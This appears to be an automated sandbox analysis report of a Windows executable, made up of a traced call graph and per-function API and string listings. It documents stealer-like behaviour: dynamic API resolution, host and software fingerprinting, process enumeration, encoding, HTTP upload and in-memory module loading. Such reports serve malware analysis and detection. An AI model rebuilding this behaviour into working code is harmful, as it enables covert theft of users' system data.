bba8a0 lstrcpy 15179->15180 15181 bb2073 15180->15181 15182 bb207e GetCurrentProcessId 15181->15182 15795 bb9470 OpenProcess 15182->15795 15185 bba920 3 API calls 15186 bb20a4 15185->15186 15187 bba8a0 lstrcpy 15186->15187 15188 bb20ad 15187->15188 15189 bba9b0 4 API calls 15188->15189 15190 bb20d7 15189->15190 15191 bba8a0 lstrcpy 15190->15191 15192 bb20e0 15191->15192 15193 bba9b0 4 API calls 15192->15193 15194 bb2100 15193->15194 15195 bba8a0 lstrcpy 15194->15195 15196 bb2109 15195->15196 15800 bb7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15196->15800 15199 bba9b0 4 API calls 15200 bb2129 15199->15200 15201 bba8a0 lstrcpy 15200->15201 15202 bb2132 15201->15202 15203 bba9b0 4 API calls 15202->15203 15204 bb2151 15203->15204 15205 bba8a0 lstrcpy 15204->15205 15206 bb215a 15205->15206 15207 bba9b0 4 API calls 15206->15207 15208 bb217b 15207->15208 15209 bba8a0 lstrcpy 15208->15209 15210 bb2184 15209->15210 15804 bb7f60 15210->15804 15213 bba9b0 4 API calls 15214 bb21a4 15213->15214 15215 bba8a0 lstrcpy 15214->15215 15216 bb21ad 15215->15216 15217 bba9b0 4 API calls 15216->15217 15218 bb21cc 15217->15218 15219 bba8a0 lstrcpy 15218->15219 15220 bb21d5 15219->15220 15221 bba9b0 4 API calls 15220->15221 15222 bb21f6 15221->15222 15223 bba8a0 lstrcpy 15222->15223 15224 bb21ff 15223->15224 15817 bb7ed0 GetSystemInfo wsprintfA 15224->15817 15227 bba9b0 4 API calls 15228 bb221f 15227->15228 15229 bba8a0 lstrcpy 15228->15229 15230 bb2228 15229->15230 15231 bba9b0 4 API calls 15230->15231 15232 bb2247 15231->15232 15233 bba8a0 lstrcpy 15232->15233 15234 bb2250 15233->15234 15235 bba9b0 4 API calls 15234->15235 15236 bb2270 15235->15236 15237 bba8a0 lstrcpy 15236->15237 15238 bb2279 15237->15238 15819 bb8100 GetProcessHeap RtlAllocateHeap 15238->15819 15241 bba9b0 4 API calls 15242 bb2299 15241->15242 15243 bba8a0 lstrcpy 15242->15243 15244 bb22a2 15243->15244 15245 bba9b0 4 API calls 15244->15245 15246 bb22c1 15245->15246 15247 bba8a0 lstrcpy 15246->15247 15248 bb22ca 15247->15248 15249 bba9b0 4 API calls 15248->15249 15250 bb22eb 15249->15250 15251 bba8a0 lstrcpy 15250->15251 15252 bb22f4 15251->15252 15825 bb87c0 15252->15825 15255 bba920 3 API calls 15256 bb231e 15255->15256 15257 bba8a0 lstrcpy 15256->15257 15258 bb2327 15257->15258 15259 bba9b0 4 API calls 15258->15259 15260 bb2351 15259->15260 15261 bba8a0 lstrcpy 15260->15261 15262 bb235a 15261->15262 15263 bba9b0 4 API calls 15262->15263 15264 bb237a 15263->15264 15265 bba8a0 lstrcpy 15264->15265 15266 bb2383 15265->15266 15267 bba9b0 4 API calls 15266->15267 15268 bb23a2 15267->15268 15269 bba8a0 lstrcpy 15268->15269 15270 bb23ab 15269->15270 15830 bb81f0 15270->15830 15272 bb23c2 15273 bba920 3 API calls 15272->15273 15274 bb23d5 15273->15274 15275 bba8a0 lstrcpy 15274->15275 15276 bb23de 15275->15276 15277 bba9b0 4 API calls 15276->15277 15278 bb240a 15277->15278 15279 bba8a0 lstrcpy 15278->15279 15280 bb2413 15279->15280 15281 bba9b0 4 API calls 15280->15281 15282 bb2432 15281->15282 15283 bba8a0 lstrcpy 15282->15283 15284 bb243b 15283->15284 15285 bba9b0 4 API calls 15284->15285 15286 bb245c 15285->15286 15287 bba8a0 lstrcpy 15286->15287 15288 bb2465 15287->15288 15289 bba9b0 4 API calls 15288->15289 15290 bb2484 15289->15290 15291 bba8a0 lstrcpy 15290->15291 15292 bb248d 15291->15292 15293 bba9b0 4 API calls 15292->15293 15294 bb24ae 15293->15294 15295 bba8a0 lstrcpy 15294->15295 15296 bb24b7 15295->15296 15838 bb8320 15296->15838 15298 bb24d3 15299 bba920 3 API calls 15298->15299 15300 bb24e6 15299->15300 15301 bba8a0 lstrcpy 15300->15301 15302 bb24ef 15301->15302 15303 bba9b0 4 API calls 15302->15303 15304 bb2519 15303->15304 15305 bba8a0 lstrcpy 15304->15305 15306 bb2522 15305->15306 15307 bba9b0 4 API calls 15306->15307 15308 bb2543 15307->15308 15309 bba8a0 lstrcpy 15308->15309 15310 bb254c 15309->15310 15311 bb8320 17 API calls 15310->15311 15312 bb2568 15311->15312 15313 bba920 3 API calls 15312->15313 15314 bb257b 15313->15314 15315 bba8a0 lstrcpy 15314->15315 15316 bb2584 15315->15316 15317 bba9b0 4 API calls 15316->15317 15318 bb25ae 15317->15318 15319 bba8a0 lstrcpy 15318->15319 15320 bb25b7 15319->15320 15321 bba9b0 4 API calls 15320->15321 15322 bb25d6 15321->15322 15323 bba8a0 lstrcpy 15322->15323 15324 bb25df 15323->15324 15325 bba9b0 4 API calls 15324->15325 15326 bb2600 15325->15326 15327 bba8a0 lstrcpy 15326->15327 15328 bb2609 15327->15328 15874 bb8680 15328->15874 15330 bb2620 15331 bba920 3 API calls 15330->15331 15332 bb2633 15331->15332 15333 bba8a0 lstrcpy 15332->15333 15334 bb263c 15333->15334 15335 bb265a lstrlen 15334->15335 15336 bb266a 15335->15336 15337 bba740 lstrcpy 15336->15337 15338 bb267c 15337->15338 15339 ba1590 lstrcpy 15338->15339 15340 bb268d 15339->15340 15884 bb5190 15340->15884 15342 bb2699 15342->13774 16072 bbaad0 15343->16072 15345 ba5009 InternetOpenUrlA 15349 ba5021 15345->15349 15346 ba502a InternetReadFile 15346->15349 15347 ba50a0 InternetCloseHandle InternetCloseHandle 15348 ba50ec 15347->15348 15348->13778 15349->15346 15349->15347 16073 ba98d0 15350->16073 15352 bb0759 15353 bb0a38 15352->15353 15354 bb077d 15352->15354 15355 ba1590 lstrcpy 15353->15355 15356 bb0799 StrCmpCA 15354->15356 15357 bb0a49 15355->15357 15358 bb07a8 15356->15358 15383 bb0843 15356->15383 16249 bb0250 15357->16249 15360 bba7a0 lstrcpy 15358->15360 15363 bb07c3 15360->15363 15362 bb0865 StrCmpCA 15364 bb0874 15362->15364 15402 bb096b 15362->15402 15365 ba1590 lstrcpy 15363->15365 15366 bba740 lstrcpy 15364->15366 15367 bb080c 15365->15367 15369 bb0881 15366->15369 15370 bba7a0 lstrcpy 15367->15370 15368 bb099c StrCmpCA 15371 bb09ab 15368->15371 15391 bb0a2d 15368->15391 15372 bba9b0 4 API calls 15369->15372 15373 bb0823 15370->15373 15374 ba1590 lstrcpy 15371->15374 15375 bb08ac 15372->15375 15376 bba7a0 lstrcpy 15373->15376 15377 bb09f4 15374->15377 15378 bba920 3 API calls 15375->15378 15379 bb083e 15376->15379 15380 bba7a0 lstrcpy 15377->15380 15381 bb08b3 15378->15381 16076 bafb00 15379->16076 15384 bb0a0d 15380->15384 15385 bba9b0 4 API calls 15381->15385 15383->15362 15386 bba7a0 lstrcpy 15384->15386 15387 bb08ba 15385->15387 15388 bb0a28 15386->15388 15389 bba8a0 lstrcpy 15387->15389 15391->13782 15402->15368 15724 bba7a0 lstrcpy 15723->15724 15725 ba1683 15724->15725 15726 bba7a0 lstrcpy 15725->15726 15727 ba1695 15726->15727 15728 bba7a0 lstrcpy 15727->15728 15729 ba16a7 15728->15729 15730 bba7a0 lstrcpy 15729->15730 15731 ba15a3 15730->15731 15731->14605 15733 ba47c6 15732->15733 15734 ba4838 lstrlen 15733->15734 15758 bbaad0 15734->15758 15736 ba4848 InternetCrackUrlA 15737 ba4867 15736->15737 15737->14682 15739 bba740 lstrcpy 15738->15739 15740 bb8b74 15739->15740 15741 bba740 lstrcpy 15740->15741 15742 bb8b82 GetSystemTime 15741->15742 15743 bb8b99 15742->15743 15744 bba7a0 lstrcpy 15743->15744 15745 bb8bfc 15744->15745 15745->14697 15747 bba931 15746->15747 15748 bba988 15747->15748 15750 bba968 lstrcpy lstrcat 15747->15750 15749 bba7a0 lstrcpy 15748->15749 15751 bba994 15749->15751 15750->15748 15751->14700 15752->14815 15754 ba4eee 15753->15754 15755 ba9af9 LocalAlloc 15753->15755 15754->14703 15754->14705 15755->15754 15756 ba9b14 CryptStringToBinaryA 15755->15756 15756->15754 15757 ba9b39 LocalFree 15756->15757 15757->15754 15758->15736 15759->14825 15760->14966 15761->14968 15762->14976 15891 bb77a0 15763->15891 15766 bb76c6 RegOpenKeyExA 15768 bb76e7 RegQueryValueExA 15766->15768 15769 bb7704 RegCloseKey 15766->15769 15767 bb1c1e 15767->15058 15768->15769 15769->15767 15771 bb1c99 15770->15771 15771->15072 15773 bb1e09 15772->15773 15773->15114 15775 bb7a9a wsprintfA 15774->15775 15776 bb1e84 15774->15776 15775->15776 15776->15128 15778 bb7b4d 15777->15778 15779 bb1efe 15777->15779 15898 bb8d20 LocalAlloc CharToOemW 15778->15898 15779->15142 15782 bba740 lstrcpy 15781->15782 15783 bb7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15782->15783 15792 bb7c25 15783->15792 15784 bb7d18 15786 bb7d28 15784->15786 15787 bb7d1e LocalFree 15784->15787 15785 bb7c46 GetLocaleInfoA 15785->15792 15788 bba7a0 lstrcpy 15786->15788 15787->15786 15791 bb7d37 15788->15791 15789 bba8a0 lstrcpy 15789->15792 15790 bba9b0 lstrcpy lstrlen lstrcpy lstrcat 15790->15792 15791->15155 15792->15784 15792->15785 15792->15789 15792->15790 15794 bb2008 15793->15794 15794->15170 15796 bb9493 GetModuleFileNameExA CloseHandle 15795->15796 15797 bb94b5 15795->15797 15796->15797 15798 bba740 lstrcpy 15797->15798 15799 bb2091 15798->15799 15799->15185 15801 bb7e68 RegQueryValueExA 15800->15801 15802 bb2119 15800->15802 15803 bb7e8e RegCloseKey 15801->15803 15802->15199 15803->15802 15805 bb7fb9 GetLogicalProcessorInformationEx 15804->15805 15806 bb8029 15805->15806 15807 bb7fd8 GetLastError 15805->15807 15810 bb89f0 2 API calls 15806->15810 15814 bb8022 15807->15814 15816 bb7fe3 15807->15816 15812 bb807b 15810->15812 15811 bb89f0 2 API calls 15813 bb2194 15811->15813 15812->15814 15815 bb8084 wsprintfA 15812->15815 15813->15213 15814->15811 15814->15813 15815->15813 15816->15805 15816->15813 15899 bb89f0 15816->15899 15902 bb8a10 GetProcessHeap RtlAllocateHeap 15816->15902 15818 bb220f 15817->15818 15818->15227 15820 bb89b0 15819->15820 15821 bb814d GlobalMemoryStatusEx 15820->15821 15822 bb8163 __aulldiv 15821->15822 15823 bb819b wsprintfA 15822->15823 15824 bb2289 15823->15824 15824->15241 15826 bb87fb GetProcessHeap RtlAllocateHeap wsprintfA 15825->15826 15828 bba740 lstrcpy 15826->15828 15829 bb230b 15828->15829 15829->15255 15831 bba740 lstrcpy 15830->15831 15837 bb8229 15831->15837 15832 bb8263 15834 bba7a0 lstrcpy 15832->15834 15833 bba9b0 lstrcpy lstrlen lstrcpy lstrcat 15833->15837 15835 bb82dc 15834->15835 15835->15272 15836 bba8a0 lstrcpy 15836->15837 15837->15832 15837->15833 15837->15836 15839 bba740 lstrcpy 15838->15839 15840 bb835c RegOpenKeyExA 15839->15840 15841 bb83ae 15840->15841 15842 bb83d0 15840->15842 15843 bba7a0 lstrcpy 15841->15843 15844 bb83f8 RegEnumKeyExA 15842->15844 15845 bb8613 RegCloseKey 15842->15845 15855 bb83bd 15843->15855 15846 bb843f wsprintfA RegOpenKeyExA 15844->15846 15847 bb860e 15844->15847 15848 bba7a0 lstrcpy 15845->15848 15849 bb84c1 RegQueryValueExA 15846->15849 15850 bb8485 RegCloseKey RegCloseKey 15846->15850 15847->15845 15848->15855 15851 bb84fa lstrlen 15849->15851 15852 bb8601 RegCloseKey 15849->15852 15853 bba7a0 lstrcpy 15850->15853 15851->15852 15854 bb8510 15851->15854 15852->15847 15853->15855 15856 bba9b0 4 API calls 15854->15856 15855->15298 15857 bb8527 15856->15857 15858 bba8a0 lstrcpy 15857->15858 15859 bb8533 15858->15859 15860 bba9b0 4 API calls 15859->15860 15861 bb8557 15860->15861 15862 bba8a0 lstrcpy 15861->15862 15863 bb8563 15862->15863 15864 bb856e RegQueryValueExA 15863->15864 15864->15852 15865 bb85a3 15864->15865 15866 bba9b0 4 API calls 15865->15866 15867 bb85ba 15866->15867 15868 bba8a0 lstrcpy 15867->15868 15869 bb85c6 15868->15869 15870 bba9b0 4 API calls 15869->15870 15871 bb85ea 15870->15871 15872 bba8a0 lstrcpy 15871->15872 15873 bb85f6 15872->15873 15873->15852 15875 bba740 lstrcpy 15874->15875 15876 bb86bc CreateToolhelp32Snapshot Process32First 15875->15876 15877 bb86e8 Process32Next 15876->15877 15878 bb875d CloseHandle 15876->15878 15877->15878 15883 bb86fd 15877->15883 15879 bba7a0 lstrcpy 15878->15879 15881 bb8776 15879->15881 15880 bba8a0 lstrcpy 15880->15883 15881->15330 15882 bba9b0 lstrcpy lstrlen lstrcpy lstrcat 15882->15883 15883->15877 15883->15880 15883->15882 15885 bba7a0 lstrcpy 15884->15885 15886 bb51b5 15885->15886 15887 ba1590 lstrcpy 15886->15887 15888 bb51c6 15887->15888 15903 ba5100 15888->15903 15890 bb51cf 15890->15342 15894 bb7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15891->15894 15893 bb76b9 15893->15766 15893->15767 15895 bb7780 RegCloseKey 15894->15895 15896 bb7765 RegQueryValueExA 15894->15896 15897 bb7793 15895->15897 15896->15895 15897->15893 15898->15779 15900 bb89f9 GetProcessHeap HeapFree 15899->15900 15901 bb8a0c 15899->15901 15900->15901 15901->15816 15902->15816 15904 bba7a0 lstrcpy 15903->15904 15905 ba5119 15904->15905 15906 ba47b0 2 API calls 15905->15906 15907 ba5125 15906->15907 16063 bb8ea0 15907->16063 15909 ba5184 15910 ba5192 lstrlen 15909->15910 15911 ba51a5 15910->15911 15912 bb8ea0 4 API calls 15911->15912 15913 ba51b6 15912->15913 15914 bba740 lstrcpy 15913->15914 15915 ba51c9 15914->15915 15916 bba740 lstrcpy 15915->15916 15917 ba51d6 15916->15917 15918 bba740 lstrcpy 15917->15918 15919 ba51e3 15918->15919 15920 bba740 lstrcpy 15919->15920 15921 ba51f0 15920->15921 15922 bba740 lstrcpy 15921->15922 15923 ba51fd InternetOpenA StrCmpCA 15922->15923 15924 ba522f 15923->15924 15925 ba58c4 InternetCloseHandle 15924->15925 15926 bb8b60 3 API calls 15924->15926 15932 ba58d9 ctype 15925->15932 15927 ba524e 15926->15927 15928 bba920 3 API calls 15927->15928 15929 ba5261 15928->15929 15930 bba8a0 lstrcpy 15929->15930 15931 ba526a 15930->15931 15933 bba9b0 4 API calls 15931->15933 15936 bba7a0 lstrcpy 15932->15936 15934 ba52ab 15933->15934 15935 bba920 3 API calls 15934->15935 15937 ba52b2 15935->15937 15943 ba5913 15936->15943 15938 bba9b0 4 API calls 15937->15938 15939 ba52b9 15938->15939 15940 bba8a0 lstrcpy 15939->15940 15941 ba52c2 15940->15941 15942 bba9b0 4 API calls 15941->15942 15944 ba5303 15942->15944 15943->15890 15945 bba920 3 API calls 15944->15945 15946 ba530a 15945->15946 15947 bba8a0 lstrcpy 15946->15947 15948 ba5313 15947->15948 15949 ba5329 InternetConnectA 15948->15949 15949->15925 15950 ba5359 HttpOpenRequestA 15949->15950 15952 ba58b7 InternetCloseHandle 15950->15952 15953 ba53b7 15950->15953 15952->15925 15954 bba9b0 4 API calls 15953->15954 15955 ba53cb 15954->15955 15956 bba8a0 lstrcpy 15955->15956 15957 ba53d4 15956->15957 15958 bba920 3 API calls 15957->15958 15959 ba53f2 15958->15959 15960 bba8a0 lstrcpy 15959->15960 15961 ba53fb 15960->15961 15962 bba9b0 4 API calls 15961->15962 15963 ba541a 15962->15963 15964 bba8a0 lstrcpy 15963->15964 15965 ba5423 15964->15965 15966 bba9b0 4 API calls 15965->15966 15967 ba5444 15966->15967 15968 bba8a0 lstrcpy 15967->15968 15969 ba544d 15968->15969 15970 bba9b0 4 API calls 15969->15970 15971 ba546e 15970->15971 15972 bba8a0 lstrcpy 15971->15972 16064 bb8ead CryptBinaryToStringA 16063->16064 16066 bb8ea9 16063->16066 16065 bb8ece GetProcessHeap RtlAllocateHeap 16064->16065 16064->16066 16065->16066 16067 bb8ef4 ctype 16065->16067 16066->15909 16068 bb8f05 CryptBinaryToStringA 16067->16068 16068->16066 16072->15345 16315 ba9880 16073->16315 16075 ba98e1 16075->15352 16077 bba740 lstrcpy 16076->16077 16250 bba740 lstrcpy 16249->16250 16251 bb0266 16250->16251 16252 bb8de0 2 API calls 16251->16252 16253 bb027b 16252->16253 16254 bba920 3 API calls 16253->16254 16255 bb028b 16254->16255 16256 bba8a0 lstrcpy 16255->16256 16257 bb0294 16256->16257 16258 bba9b0 4 API calls 16257->16258 16259 bb02b8 16258->16259 16316 ba988e 16315->16316 16319 ba6fb0 16316->16319 16318 ba98ad ctype 16318->16075 16322 ba6d40 16319->16322 16323 ba6d63 16322->16323 16333 ba6d59 16322->16333 16338 ba6530 16323->16338 16327 ba6dbe 16327->16333 16348 ba69b0 16327->16348 16329 ba6e2a 16330 ba6ee6 VirtualFree 16329->16330 16331 ba6ef7 16329->16331 16329->16333 16330->16331 16332 ba6f41 16331->16332 16335 ba6f38 16331->16335 16336 ba6f26 FreeLibrary 16331->16336 16332->16333 16334 bb89f0 2 API calls 16332->16334 16333->16318 16334->16333 16337 bb89f0 2 API calls 16335->16337 16336->16331 16337->16332 16339 ba6542 16338->16339 16341 ba6549 16339->16341 16358 bb8a10 GetProcessHeap RtlAllocateHeap 16339->16358 16341->16333 16342 ba6660 16341->16342 16347 ba668f VirtualAlloc 16342->16347 16344 ba6730 16345 ba673c 16344->16345 16346 ba6743 VirtualAlloc 16344->16346 16345->16327 16346->16345 16347->16344 16347->16345 16349 ba69c9 16348->16349 16353 ba69d5 16348->16353 16350 ba6a09 LoadLibraryA 16349->16350 16349->16353 16351 ba6a32 16350->16351 16350->16353 16355 ba6ae0 16351->16355 16359 bb8a10 GetProcessHeap RtlAllocateHeap 16351->16359 16353->16329 16354 ba6ba8 GetProcAddress 16354->16353 16354->16355 16355->16353 16355->16354 16356 bb89f0 2 API calls 16356->16355 16357 ba6a8b 16357->16353 16357->16356 16358->16341 16359->16357

                                  Executed Functions

                                  Function 00BB9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 bb9860-bb9874 call bb9750 663 bb987a-bb9a8e call bb9780 GetProcAddress * 21 660->663 664 bb9a93-bb9af2 LoadLibraryA * 5 660->664 663->664 666 bb9b0d-bb9b14 664->666 667 bb9af4-bb9b08 GetProcAddress 664->667 669 bb9b46-bb9b4d 666->669 670 bb9b16-bb9b41 GetProcAddress * 2 666->670 667->666 671 bb9b68-bb9b6f 669->671 672 bb9b4f-bb9b63 GetProcAddress 669->672 670->669 673 bb9b89-bb9b90 671->673 674 bb9b71-bb9b84 GetProcAddress 671->674 672->671 675 bb9b92-bb9bbc GetProcAddress * 2 673->675 676 bb9bc1-bb9bc2 673->676 674->673 675->676
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,01401A38), ref: 00BB98A1
                                  • GetProcAddress.KERNEL32(76210000,01401918), ref: 00BB98BA
                                  • GetProcAddress.KERNEL32(76210000,014018B8), ref: 00BB98D2
                                  • GetProcAddress.KERNEL32(76210000,01401768), ref: 00BB98EA
                                  • GetProcAddress.KERNEL32(76210000,014018E8), ref: 00BB9903
                                  • GetProcAddress.KERNEL32(76210000,01409C60), ref: 00BB991B
                                  • GetProcAddress.KERNEL32(76210000,013F5428), ref: 00BB9933
                                  • GetProcAddress.KERNEL32(76210000,013F55E8), ref: 00BB994C
                                  • GetProcAddress.KERNEL32(76210000,01401750), ref: 00BB9964
                                  • GetProcAddress.KERNEL32(76210000,014018A0), ref: 00BB997C
                                  • GetProcAddress.KERNEL32(76210000,01401930), ref: 00BB9995
                                  • GetProcAddress.KERNEL32(76210000,014017C8), ref: 00BB99AD
                                  • GetProcAddress.KERNEL32(76210000,013F53A8), ref: 00BB99C5
                                  • GetProcAddress.KERNEL32(76210000,01401948), ref: 00BB99DE
                                  • GetProcAddress.KERNEL32(76210000,01401780), ref: 00BB99F6
                                  • GetProcAddress.KERNEL32(76210000,013F54A8), ref: 00BB9A0E
                                  • GetProcAddress.KERNEL32(76210000,01401798), ref: 00BB9A27
                                  • GetProcAddress.KERNEL32(76210000,014017E0), ref: 00BB9A3F
                                  • GetProcAddress.KERNEL32(76210000,013F5448), ref: 00BB9A57
                                  • GetProcAddress.KERNEL32(76210000,01401960), ref: 00BB9A70
                                  • GetProcAddress.KERNEL32(76210000,013F56E8), ref: 00BB9A88
                                  • LoadLibraryA.KERNEL32(01401978,?,00BB6A00), ref: 00BB9A9A
                                  • LoadLibraryA.KERNEL32(014019A8,?,00BB6A00), ref: 00BB9AAB
                                  • LoadLibraryA.KERNEL32(014019C0,?,00BB6A00), ref: 00BB9ABD
                                  • LoadLibraryA.KERNEL32(014019D8,?,00BB6A00), ref: 00BB9ACF
                                  • LoadLibraryA.KERNEL32(01401840,?,00BB6A00), ref: 00BB9AE0
                                  • GetProcAddress.KERNEL32(75B30000,014017F8), ref: 00BB9B02
                                  • GetProcAddress.KERNEL32(751E0000,01401810), ref: 00BB9B23
                                  • GetProcAddress.KERNEL32(751E0000,01401828), ref: 00BB9B3B
                                  • GetProcAddress.KERNEL32(76910000,0140A0E8), ref: 00BB9B5D
                                  • GetProcAddress.KERNEL32(75670000,013F53E8), ref: 00BB9B7E
                                  • GetProcAddress.KERNEL32(77310000,01409BB0), ref: 00BB9B9F
                                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00BB9BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00BB9BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 043a2046a33589e588696d591183d56a031cd9f8d82ca149c6bb915f044ef931
                                  • Instruction ID: b5b01b9db5c5bd0e04938a314bacaa372aa48ee9d41a43f705f73516d9160065
                                  • Opcode Fuzzy Hash: 043a2046a33589e588696d591183d56a031cd9f8d82ca149c6bb915f044ef931
                                  • Instruction Fuzzy Hash: C4A11AB95003829FD354FFACEDC89663BF9F788305705851AA605CB364D639B881DB72
                                  Function 00BA45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 ba45c0-ba4695 RtlAllocateHeap 781 ba46a0-ba46a6 764->781 782 ba474f-ba47a9 VirtualProtect 781->782 783 ba46ac-ba474a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BA479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA45F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA45E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA45C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA45D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA45DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA46CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
